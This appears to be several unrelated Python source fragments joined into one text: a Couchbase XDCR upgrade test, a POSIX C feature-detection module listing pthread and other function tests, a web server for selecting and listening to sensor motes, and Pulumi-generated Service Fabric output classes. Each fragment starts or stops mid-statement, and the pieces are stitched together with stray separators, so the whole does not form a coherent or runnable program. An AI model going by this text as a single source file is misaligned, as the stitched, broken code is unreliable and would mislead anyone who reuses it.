"error message not found as expected in " + str(node.ip))
self.assertEqual(count4, 0, "Disconnect errors found in " + str(node.ip))
self.assertEqual(count5, 0, "GOGC reset to 0 during upgrade in " + str(node.ip))
def _operations(self):
# TODO: there are not tests with views
if self.ddocs_num_src:
ddocs = self._create_views(self.ddocs_num_src, self.buckets_on_src,
self.views_num_src, self.src_master)
self.ddocs_src.extend(ddocs)
if self.ddocs_num_dest:
ddocs = self._create_views(self.ddocs_num_dest, self.buckets_on_dest,
self.views_num_dest, self.dest_master)
self.ddocs_dest.extend(ddocs)
def _verify(self, expected_rows):
if self.ddocs_src:
self._verify_ddocs(expected_rows, self.buckets_on_src, self.ddocs_src, self.src_master)
if self.ddocs_dest:
self._verify_ddocs(expected_rows, self.buckets_on_dest, self.ddocs_dest, self.dest_master)
def _create_views(self, ddocs_num, buckets, views_num, server):
ddocs = []
if ddocs_num:
self.default_view = View(self.default_view_name, None, None)
for bucket in buckets:
for i in xrange(ddocs_num):
views = self.make_default_views(self.default_view_name, views_num,
self.is_dev_ddoc, different_map=True)
ddoc = DesignDocument(self.default_view_name + str(i), views)
bucket_server = self._get_bucket(bucket, server)
tasks = self.async_create_views(server, ddoc.name, views, bucket=bucket_server)
for task in tasks:
task.result(timeout=90)
ddocs.append(ddoc)
return ddocs
def _verify_ddocs(self, expected_rows, buckets, ddocs, server):
query = {"connectionTimeout" : 60000}
if self.max_verify:
expected_rows = self.max_verify
query["limit"] = expected_rows
for bucket in buckets:
for ddoc in ddocs:
prefix = ("", "dev_")[ddoc.views[0].dev_view]
bucket_server = self._get_bucket(bucket, server)
self.perform_verify_queries(len(ddoc.views), prefix, ddoc.name, query, bucket=bucket_server,
wait_time=self.wait_timeout * 5, expected_rows=expected_rows,
retry_time=10, server=server)
def _post_upgrade_ops(self):
if self.post_upgrade_ops:
for op_cluster in self.post_upgrade_ops.split(';'):
cluster, op = op_cluster.split('-')
if op == 'rebalancein':
free_servs= copy.copy(self.servers)
for ser in self.servers:
for used in self.src_nodes+self.dest_nodes:
if ser.ip == used.ip:
free_servs.remove(ser)
break
servers_to_add = free_servs[:self.nodes_in]
if servers_to_add:
temp = self.initial_version
self.initial_version = self.upgrade_versions[0]
self._install(servers_to_add)
self.initial_version = temp
if cluster == 'src':
self.cluster.rebalance(self.src_nodes, servers_to_add, [])
self.src_nodes.extend(servers_to_add)
elif cluster == 'dest':
try:
self.cluster.rebalance(self.dest_nodes, servers_to_add, [])
self.dest_nodes.extend(servers_to_add)
except RebalanceFailedException:
if self._check_del_compatibility:
for node in servers_to_add:
err, numerr = NodeHelper.check_goxdcr_log(node,"Invalid format specified for DCP_DELETION",\
log_name="memcached.log",print_matches=True)
if numerr >= 1:
self.fail("MB-31141 has been hit!")
else:
self.fail("Rebalance failed")
elif op == 'rebalanceout':
if cluster == 'src':
self.src_master = self.servers[0]
rebalance_out_candidates = filter(lambda node: node.ip != self.src_master.ip, self.src_nodes)
self.cluster.rebalance(self.src_nodes, [], rebalance_out_candidates[:self.nodes_out])
for node in rebalance_out_candidates[:self.nodes_out]:
self.src_nodes.remove(node)
elif cluster | |
c.function_test('int', 'const pthread_attr_t*', 'struct sched_param*')
pthread_attr_getschedpolicy = c.function_test('int', 'const pthread_attr_t*', 'int*')
pthread_attr_getscope = c.function_test('int', 'const pthread_attr_t*', 'int*')
pthread_attr_getstack = c.function_test('int', 'const pthread_attr_t*', 'void**', 'size_t*')
pthread_attr_getstackaddr = c.function_test('int', 'const pthread_attr_t*', 'void**')
pthread_attr_getstacksize = c.function_test('int', 'const pthread_attr_t*', 'size_t*')
@property
def pthread_attr_init(self):
if self.pthread_create:
return c.Function('int', 'pthread_attr_t*')
@property
def pthread_attr_setdetachstate(self):
if self.pthread_create:
return c.Function('int', 'pthread_attr_t*', 'int')
pthread_attr_setguardsize = c.function_test('int', 'pthread_attr_t*', 'size_t')
pthread_attr_setinheritsched = c.function_test('int', 'pthread_attr_t*', 'int')
pthread_attr_setschedparam = c.function_test('int', 'pthread_attr_t*', 'const struct sched_param*')
pthread_attr_setschedpolicy = c.function_test('int', 'pthread_attr_t*', 'int')
pthread_attr_setscope = c.function_test('int', 'pthread_attr_t*', 'int')
pthread_attr_setstack = c.function_test('int', 'pthread_attr_t*', 'void*', 'size_t')
pthread_attr_setstackaddr = c.function_test('int', 'pthread_attr_t*', 'void*')
pthread_attr_setstacksize = c.function_test('int', 'pthread_attr_t*', 'size_t')
@property
def pthread_barrier_destroy(self):
if self.pthread_barrier_init:
return c.Function('int', 'pthread_barrier_t*')
pthread_barrier_init = c.function_test('int', 'pthread_barrier_t*', 'const pthread_barrierattr_t*', 'unsigned', test='''
#include <pthread.h>
int main() {
pthread_barrier_t barrier;
if (pthread_barrier_init(&barrier, 0, 1) != 0) return 1;
if (pthread_barrier_wait(&barrier) != PTHREAD_BARRIER_SERIAL_THREAD) return 1;
if (pthread_barrier_destroy(&barrier) != 0) return 1;
return 0;
}
''')
@property
def pthread_barrier_wait(self):
if self.pthread_barrier_init:
return c.Function('int', 'pthread_barrier_t*')
pthread_barrierattr_destroy = c.function_test('int', 'pthread_barrierattr_t*')
pthread_barrierattr_getpshared = c.function_test('int', 'const pthread_barrierattr_t*', 'int*')
pthread_barrierattr_init = c.function_test('int', 'pthread_barrierattr_t*')
pthread_barrierattr_setpshared = c.function_test('int', 'pthread_barrierattr_t*', 'int')
pthread_cancel = c.function_test('int', 'pthread_t')
pthread_cleanup_push = c.function_test('void', 'void (*)(void*)', 'void*')
pthread_cleanup_pop = c.function_test('void', 'int')
@property
def pthread_cond_broadcast(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*')
@property
def pthread_cond_destroy(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*')
pthread_cond_init = c.function_test('int', 'pthread_cond_t*', 'const pthread_condattr_t*', test='''
#include <pthread.h>
int main() {
pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_lock(&mutex) != 0) return 1;
if (pthread_cond_init(&cond, 0) != 0) return 1;
if (pthread_cond_broadcast(&cond) != 0) return 1;
if (pthread_cond_signal(&cond) != 0) return 1;
if (pthread_cond_timedwait(&cond, &mutex, &t) != 0) return 1;
if (pthread_cond_wait(&cond, &mutex) != 0) return 1;
if (pthread_cond_destroy(&cond) != 0) return 1;
return 0;
}
''')
@property
def pthread_cond_signal(self):
if self.pthread_cond_init:
return c.Function ('int', 'pthread_cond_t*')
@property
def pthread_cond_timedwait(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*', 'pthread_mutex_t*', 'const struct timespec*')
@property
def pthread_cond_wait(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*', 'pthread_mutex_t*')
pthread_condattr_destroy = c.function_test('int', 'pthread_condattr_t*')
pthread_condattr_getclock = c.function_test('int', 'const pthread_condattr_t*', 'clockid_t*')
pthread_condattr_getpshared = c.function_test('int', 'const pthread_condattr_t*', 'int*')
pthread_condattr_init = c.function_test('int', 'pthread_condattr_t*')
pthread_condattr_setclock = c.function_test('int', 'pthread_condattr_t*', 'clockid_t')
pthread_condattr_setpshared = c.function_test('int', 'pthread_condattr_t*', 'int')
pthread_create = c.function_test('int', 'pthread_t*', 'const pthread_attr_t*', 'void* (*)(void*)', 'void*', test='''
#include <pthread.h>
void* start(void* data) { return NULL; }
int main(int argc, char** argv) {
pthread_t thr;
pthread_attr_t attr;
pthread_attr_init(&attr);
pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
int res = pthread_create(&thr, &attr, start, NULL);
pthread_attr_destroy(&attr);
return res;
}
''')
pthread_detach = c.function_test('int', 'pthread_t')
pthread_equal = c.function_test('int', 'pthread_t', 'pthread_t')
pthread_exit = c.function_test('void', 'void*')
pthread_getconcurrency = c.function_test('int', 'void')
pthread_getcpuclockid = c.function_test('int', 'pthread_t', 'clockid_t*')
pthread_getschedparam = c.function_test('int', 'pthread_t', 'int*', 'struct sched_param*')
pthread_getspecific = c.function_test('void*', 'pthread_key_t')
pthread_join = c.function_test('int', 'pthread_t', 'void**')
pthread_key_create = c.function_test('int', 'pthread_key_t*', 'void (*)(void*)')
pthread_key_delete = c.function_test('int', 'pthread_key_t')
@property
def pthread_mutex_destroy(self):
if self.pthread_mutex_init:
return c.Function('int', 'pthread_mutex_t*')
pthread_mutex_getprioceiling = c.function_test('int', 'const pthread_mutex_t*', 'int*')
pthread_mutex_init = c.function_test('int', 'pthread_mutex_t*', 'const pthread_mutexattr_t*', test='''
#include <pthread.h>
int main() {
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_lock(&mutex) != 0) return 1;
if (pthread_mutex_unlock(&mutex) != 0) return 1;
if (pthread_mutex_destroy(&mutex) != 0) return 1;
return 0;
}
''')
def pthread_mutex_lock(self):
if self.pthread_mutex_init:
return c.Function('int', 'pthread_mutex_t*')
pthread_mutex_setprioceiling = c.function_test('int', 'pthread_mutex_t*', 'int', 'int*')
pthread_mutex_timedlock = c.function_test('int', 'pthread_mutex_t*', 'const struct timespec*', test='''
#include <pthread.h>
int main() {
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_timedlock(&mutex, &t) != 0) return 1;
if (pthread_mutex_unlock(&mutex) != 0) return 1;
if (pthread_mutex_destroy(&mutex) != 0) return 1;
return 0;
}
''')
pthread_mutex_trylock = c.function_test('int', 'pthread_mutex_t*', test='''
#include <pthread.h>
int main() {
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_trylock(&mutex) != 0) return 1;
if (pthread_mutex_unlock(&mutex) != 0) return 1;
if (pthread_mutex_destroy(&mutex) != 0) return 1;
return 0;
}
''')
def pthread_mutex_unlock(self):
if self.pthread_mutex_init:
return c.Function('int', 'pthread_mutex_t*')
pthread_mutexattr_destroy = c.function_test('int', 'pthread_mutexattr_t*')
pthread_mutexattr_getprioceiling = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_getprotocol = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_getpshared = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_gettype = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_init = c.function_test('int', 'pthread_mutexattr_t*')
pthread_mutexattr_setprioceiling = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_mutexattr_setprotocol = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_mutexattr_setpshared = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_mutexattr_settype = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_once = c.function_test('int', 'pthread_once_t*', 'void (*)(void)')
@property
def pthread_rwlock_destroy(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
pthread_rwlock_init = c.function_test('int', 'pthread_rwlock_t*', 'const pthread_rwlockattr_t*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_rdlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_wrlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
@property
def pthread_rwlock_rdlock(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
pthread_rwlock_timedrdlock = c.function_test('int', 'pthread_rwlock_t*', 'const struct timespec*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_timedrdlock(&rwlock, &t) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
pthread_rwlock_timedwrlock = c.function_test('int', 'pthread_rwlock_t*', 'const struct timespec*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_timedwrlock(&rwlock, &t) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
pthread_rwlock_tryrdlock = c.function_test('int', 'pthread_rwlock_t*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_tryrdlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
pthread_rwlock_trywrlock = c.function_test('int', 'pthread_rwlock_t*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_trywrlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
@property
def pthread_rwlock_unlock(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
@property
def pthread_rwlock_wrlock(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
pthread_rwlockattr_destroy = c.function_test('int', 'pthread_rwlockattr_t*')
pthread_rwlockattr_getpshared = c.function_test('int', 'const pthread_rwlockattr_t*', 'int*')
pthread_rwlockattr_init = c.function_test('int', 'pthread_rwlockattr_t*')
pthread_rwlockattr_setpshared = c.function_test('int', 'pthread_rwlockattr_t*', 'int')
pthread_self = c.function_test('pthread_t', 'void')
pthread_setcancelstate = c.function_test('int', 'int', 'int*')
pthread_setcanceltype = c.function_test('int', 'int', 'int*')
pthread_setconcurrency = c.function_test('int', 'int')
pthread_setschedparam = c.function_test('int', 'pthread_t', 'int', 'const struct sched_param*')
pthread_setschedprio = c.function_test('int', 'pthread_t', 'int')
pthread_setspecific = c.function_test('int', 'pthread_key_t', 'const void*')
@property
def pthread_spin_destroy(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
pthread_spin_init = c.function_test('int', 'pthread_spinlock_t*', 'int', test='''
#include <pthread.h>
int main() {
pthread_spinlock_t spin;
if (pthread_spin_init(&spin, 0) != 0) return 1;
if (pthread_spin_lock(&spin) != 0) return 1;
if (pthread_spin_unlock(&spin) != 0) return 1;
if (pthread_spin_trylock(&spin) != 0) return 1;
if (pthread_spin_unlock(&spin) != 0) return 1;
if (pthread_spin_destroy(&spin) != 0) return 1;
return 0;
}
''')
@property
def pthread_spin_lock(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
@property
def pthread_spin_trylock(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
@property
def pthread_spin_unlock(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
pthread_testcancel = c.function_test('void', 'void')
class pwd_h(c.Test):
header = c.header_test('pwd.h')
class regex_h(c.Test):
header = c.header_test('regex.h')
class sched_h(c.Test):
header = c.header_test('sched.h')
class search_h(c.Test):
header = c.header_test('search.h')
class semaphore_h(c.Test):
header = c.header_test('semaphore.h')
class setjmp_h(c99.setjmp_h):
sigjmp_buf = c.type_test()
siglongjmp = c.function_test('void', 'sigjmp_buf', 'int', test='''
#include <setjmp.h>
int main() {
jmp_buf env;
int i = sigsetjmp(env, 0);
if (i == 2) return 0;
siglongjmp(env, 2);
return 2;
}
''')
@property
def sigsetjmp(self):
if self.siglongjmp:
return c.Function('int', 'sigjmp_buf', 'int')
class signal_h(c99.signal_h):
pass
class spawn_h(c.Test):
header = c.header_test('spawn.h')
class stdarg_h(c99.stdarg_h):
pass
stdbool_h = c99.stdbool_h
stddef_h = c99.stddef_h
class stdint_h(c99.stdint_h):
pass
class stdio_h(c99.stdio_h):
pass
class stdlib_h(c99.stdlib_h):
drand48 = c.function_test('double', 'void')
lrand48 = c.function_test('long', 'void')
mkstemp = c.function_test('int', 'char*', test='''
#include <stdlib.h>
#include <unistd.h>
int main() {
char s[] = "XXXXXX";
int fd;
if ((fd = mkstemp(s)) == -1) return 1;
if (close(fd) == -1) return 1;
return 0;
}
''')
realpath = c.function_test('char*', 'const char*', 'char*')
srand = c.function_test('void', 'unsigned int')
srand48 = c.function_test('void', 'long')
class string_h(c99.string_h):
strdup = c.function_test('char*', 'const char*')
strerror_r = c.function_test('int', 'int', 'char*', 'size_t', test='''
#include <string.h>
int main() {
char b[50];
int r = strerror_r(0, b, 50);
return r == 0 ? 0 : 1;
}
''')
class strings_h(c.Test):
header | |
+ "/write?port=" + fullPortName
try:
req = urllib2.urlopen(url, qs["data"][0])
output = req.read()
self.writeChunk(output)
except Exception as e:
self.writeChunk("hostUnreachable")
def serveListen(self, qs):
self.setSession(qs)
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
motesText = self.serveMotes("listen", "Listen", qs, None, True)
errorStyle = "none"
errorMsg = ""
global isListening
if "action" in qs and self.getLevel() > 1:
if qs["action"][0] == "Start":
if not motes.anySelected():
errorMsg = "\n<h4 class='err'>Error: No motes selected!</h4>\n"
errorStyle = "block"
elif isListening:
errorMsg = "\n<h4 class='err'>Already listening!</h4>\n"
errorStyle = "block"
else:
sensor_data.moteData.reset()
ht.openAllSerial()
isListening = True
# Open DB connection
data_utils.openDBConnection()
else:
ht.closeAllSerial()
isListening = False
# Close DB connection
data_utils.closeDBConnection()
txt = ""
for line in sensor_data.moteData.listenTxt:
txt += line + "<br/>"
if errorMsg == "":
action = "Stop" if isListening else "Start"
else:
action = "Start"
dataFilename = configuration.c.getCfgValue("saveToFilename")
saveProcessedData = configuration.c.getCfgValueAsBool("saveProcessedData")
if self.getLevel() > 1:
if "dataFile" in qs:
dataFilename = qs["dataFile"][0]
if len(dataFilename) and dataFilename.find(".") == -1:
dataFilename += ".csv"
if "dataType" in qs:
saveProcessedData = not qs["dataType"][0] == "raw"
saveMultipleFiles = qs["dataType"][0] == "mprocessed"
configuration.c.setCfgValue("saveToFilename", dataFilename)
configuration.c.setCfgValue("saveProcessedData", bool(saveProcessedData))
configuration.c.save()
rawdataChecked = not saveProcessedData
mprocessedChecked = saveProcessedData
self.serveAnyPage("listen", qs, True, {"MOTES_TXT" : motesText,
"LISTEN_TXT" : txt,
"MOTE_ACTION": action,
"DATA_FILENAME" : dataFilename,
"RAWDATA_CHECKED" : 'checked="checked"' if rawdataChecked else "",
"MPROCDATA_CHECKED" : 'checked="checked"' if mprocessedChecked else "",
"ERROR_MSG" : errorMsg,
"ERROR_STATUS" : errorStyle})
def serveMotes(self, action, namedAction, qs, form, extra = False):
disabled = "" if self.getLevel() > 1 else 'disabled="disabled" '
c = ""
for m in motes.getMotesSorted():
name = "mote" + m.getFullBasename()
if qs:
if name in qs:
m.isSelected = qs[name][0] == 'on'
elif "action" in qs:
m.isSelected = False
elif form:
if name in form:
m.isSelected = form[name].value == "on"
else:
m.isSelected = False
checked = ' checked="checked"' if m.isSelected else ""
c += '<div class="mote"><strong>Mote: </strong>'
if extra:
c += "<a href='javascript:talkToMote(\"" + utils.urlEscape(m.getFullBasename()) +"\")' " + disabled + ">"
arr = m.getFullName().split("@")
if (len(arr) == 1):
c += m.getFullName()
else:
c += arr[0]
arr = m.getFullName().split("@")
if arr[1] != "Local":
c += " @ " + m.getFullName().split("@")[1][7:].split(":")[0]
c += "</a>"
else:
c += m.getFullName()
c += ' (<strong>Platform: </strong>' + m.platform + ') '
c += ' <input type="checkbox" title="Select the mote" name="' + name + '"'
c += checked + ' ' + disabled + '/>' + namedAction
c += '</div>\n'
# remember which motes were selected and which were not
motes.storeSelected()
if c:
c = '<div class="motes1">\nAttached motes:\n<br/>\n' + c + '</div>\n'
return c
def serveBlockly(self, qs):
self.setSession(qs)
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
self.serveAnyPage("blockly", qs)
def serveSealFrame(self, qs):
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
path = os.path.join(self.sealBlocklyDirectory, "index.html")
with open(path) as f:
contents = f.read()
disabled = 'disabled="disabled"' if not self.getLevel() > 1 else ""
contents = contents.replace("%DISABLED%", disabled)
motesText = self.serveMotes("upload", "Upload", qs, None)
contents = contents.replace("%MOTES_TXT%", motesText)
self.writeChunk(contents)
def serve404Error(self, path, qs):
self.setSession(qs)
self.send_response(404)
self.sendDefaultHeaders()
self.end_headers()
qs["no"] = "no"
self.serveAnyPage("error", qs,
errorMsg = "<strong>Error 404: path " + path + " not found on the server</strong>\n")
def serveFile(self, filename, qs):
mimetype = 'text/html'
if filename[-4:] == '.css':
mimetype = 'text/css'
if filename[-9:] == 'theme.css':
tpath = filename[:-4]
filename = filename[:-4] + configuration.c.getCfgValue("serverTheme") + '.css'
theme = self.getCookie("Msma37")
if theme:
theme = allSessions.get_session_old(theme)
if theme and hasattr(theme, "_user") and "theme" in theme._user and theme._user["theme"] != "server":
# "server" means as same as server
theme = tpath + theme._user["theme"] + '.css'
if os.path.exists(theme):
filename = theme
elif filename[-3:] == '.js': mimetype = 'application/javascript'
elif filename[-4:] == '.png': mimetype = 'image/png'
elif filename[-4:] == '.gif': mimetype = 'image/gif'
elif filename[-4:] == '.jpg': mimetype = 'image/jpg'
elif filename[-4:] == '.tif': mimetype = 'image/tif'
try:
f = open(filename, "rb")
contents = f.read()
self.send_response(200)
self.send_header('Content-Type', mimetype)
self.send_header('Content-Length', str(len(contents)))
self.send_header('Cache-Control', 'public,max-age=1000')
if DEBUG:
# enable cache
self.send_header('Last-Modified', 'Wed, 15 Sep 2004 12:00:00 GMT')
self.send_header('Expires', 'Sun, 17 Jan 2038 19:14:07 GMT')
self.end_headers()
self.wfile.write(contents)
f.close()
except:
print("problem with file " + filename + "\n")
self.serve404Error(filename, qs)
def do_GET(self):
self.headerIsServed = False
o = urlparse(self.path)
qs = parse_qs(o.query)
# global lastUploadCode
# global lastUploadConfig
# global lastUploadFile
# TODO:
# if "Android" in self.headers["user-agent"]:
# self.htmlDirectory = self.htmlDirectory + "_mobile"
if o.path == "/" or o.path == "/default":
self.serveDefault(qs)
elif o.path == "/motes":
self.serveMoteSelect(qs)
elif o.path == "/config":
self.serveConfig(qs)
elif o.path == "/graph":
self.serveGraphs(qs)
elif o.path == "/graph-data":
self.serveGraphData(qs)
elif o.path == "/graph-form":
self.serveGraphForm(qs)
elif o.path == "/upload":
self.serveUploadGet(qs) #, lastUploadCode, lastUploadConfig, lastUploadFile)
elif o.path == "/login":
self.serveLogin(qs)
elif o.path == "/server":
self.serveServer(qs)
elif o.path == "/account":
self.serveAccount(qs)
elif o.path == "/users":
self.serveUsers(qs)
elif o.path == "/upload-result":
self.serveUploadResult(qs)
elif o.path == "/listen":
self.serveListen(qs)
elif o.path == "/listen-single":
self.serveListenSingle(qs)
elif o.path == "/talk-to":
self.serveTalkTo(qs)
elif o.path == "/listen-data":
self.serveListenData(qs)
elif o.path == "/blockly":
self.serveBlockly(qs)
elif o.path == "/seal-frame":
self.serveSealFrame(qs)
elif o.path[:13] == "/seal-blockly":
self.serveFile(os.path.join(self.sealBlocklyDirectory, o.path[14:]), qs)
elif o.path == "/sync":
self.serveSync(qs)
elif o.path == "/code":
# qs['src'] contains SEAL-Blockly code
code = qs.get('src')[0] if "src" in qs else ""
config = qs.get('config')[0] if "config" in qs else ""
# Parse the form data posted
self.serveMotes("upload", "Upload", qs, None)
if motes.anySelected():
self.compileAndUpload(code, config, None, None, 'seal')
self.serveSync(qs)
elif o.path[-4:] == ".css":
self.serveFile(os.path.join(self.htmlDirectory, "css", o.path[1:]), qs)
elif o.path[-4:] in [".png", ".jpg", ".gif", ".tif"]:
self.serveFile(os.path.join(self.htmlDirectory, "img", o.path[1:]), qs)
elif o.path[-3:] in [".js"]:
self.serveFile(os.path.join(self.htmlDirectory, "js", o.path[1:]), qs)
else:
self.serve404Error(o.path, qs)
def serveBody(self, name, qs = {'sma': ['0000000'],}, replaceValues = None):
contents = ""
disabled = "" if self.getLevel() > 1 else 'disabled="disabled" '
with open(self.htmlDirectory + "/" + name + ".html", "r") as f:
contents = f.read()
if replaceValues:
for v in replaceValues:
contents = contents.replace("%" + v + "%", replaceValues[v])
contents = contents.replace("%DISABLED%", disabled)
if "sma" in qs: contents = contents.replace("%SMA%", qs["sma"][0])
return contents
# Dummy, have to respond somehow, so javascript knows we are here
def serveSync(self, qs):
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
if self.getLevel() > 1:
self.writeChunk("writeAccess=True")
def serveListenData(self, qs):
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
text = ""
for line in sensor_data.moteData.listenTxt:
text += line + "<br/>"
if text:
self.writeChunk(text)
def do_POST(self):
self.headerIsServed = False
o = urlparse(self.path)
qs = parse_qs(o.query)
# TODO
# if "Android" in self.headers["user-agent"]:
# self.htmlDirectory = self.htmlDirectory + "_mobile"
# global lastUploadCode
# global lastUploadConfig
# global lastUploadFile
if o.path == "/upload":
self.serveUploadPost(qs) #, lastUploadCode, lastUploadConfig, lastUploadFile)
else:
self.serve404Error(o.path, qs)
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
# Overrides BaseServer function to get better control over interrupts
def serve_forever(self, poll_interval = 0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self._BaseServer__is_shut_down.clear()
try:
while not self._BaseServer__shutdown_request:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = select.select([self], [], [], poll_interval)
if self in r:
self._handle_request_noblock()
finally:
self._BaseServer__shutdown_request = False
self._BaseServer__is_shut_down.set()
if os.name == "posix":
# kill the process to make sure it exits
os.kill(os.getpid(), signal.SIGKILL)
# --------------------------------------------
def makeDefaultUserFile(userDirectory, userFile):
if not os.path.exists(userDirectory):
os.makedirs(userDirectory)
uf = open(userDirectory + "/" + userFile, "w")
for at in configuration.c.getCfgValueAsList("userAttributes"):
uf.write(at + " ")
uf.write("\n")
for ad in configuration.c.getCfgValueAsList("adminValues"):
uf.write(ad + " ")
uf.write("\n")
for x in configuration.c.getCfgValueAsList("defaultValues"):
if x.lower() == "unknown": x = "user"
uf.write(x + " ")
uf.write("\n")
uf.close()
return str(userDirectory + "/" + userFile)
def readUsers(userDirectory, userFile):
global allUsers
uf = open(userDirectory + "/" + userFile,"r")
i = False
for line in uf:
if not i:
i = True
allUsers = user.Users(line.split(), userDirectory, userFile)
else:
allUsers.add_user(line.split())
uf.close()
return i
def initalizeUsers():
global allSessions
allSessions = session.Sessions()
userDirectory = os.path.abspath(configuration.c.getCfgValue("userDirectory"))
userFile = configuration.c.getCfgValue("userFile")
if not os.path.exists(userDirectory + "/" + userFile):
print("No user file. Add default in " + makeDefaultUserFile(userDirectory, userFile))
if not readUsers(userDirectory, userFile):
print("User file is empty!")
print("New default file made in " + makeDefaultUserFile(userDirectory, userFile))
readUsers(userDirectory, userFile)
if not "name" in allUsers._userAttributes:
print("User attribute \"name\" | |
None:
pulumi.set(__self__, "x509_store_name", x509_store_name)
@property
@pulumi.getter(name="commonNames")
def common_names(self) -> Optional[Sequence['outputs.ServerCertificateCommonNameResponse']]:
"""
The list of server certificates referenced by common name that are used to secure the cluster.
"""
return pulumi.get(self, "common_names")
@property
@pulumi.getter(name="x509StoreName")
def x509_store_name(self) -> Optional[str]:
"""
The local certificate store location.
"""
return pulumi.get(self, "x509_store_name")
@pulumi.output_type
class ServiceCorrelationDescriptionResponse(dict):
"""
Creates a particular correlation between services.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "serviceName":
suggest = "service_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceCorrelationDescriptionResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceCorrelationDescriptionResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceCorrelationDescriptionResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
scheme: str,
service_name: str):
"""
Creates a particular correlation between services.
:param str scheme: The ServiceCorrelationScheme which describes the relationship between this service and the service specified via ServiceName.
:param str service_name: The name of the service that the correlation relationship is established with.
"""
pulumi.set(__self__, "scheme", scheme)
pulumi.set(__self__, "service_name", service_name)
@property
@pulumi.getter
def scheme(self) -> str:
"""
The ServiceCorrelationScheme which describes the relationship between this service and the service specified via ServiceName.
"""
return pulumi.get(self, "scheme")
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> str:
"""
The name of the service that the correlation relationship is established with.
"""
return pulumi.get(self, "service_name")
@pulumi.output_type
class ServiceLoadMetricDescriptionResponse(dict):
"""
Specifies a metric to load balance a service during runtime.
"""
@staticmethod
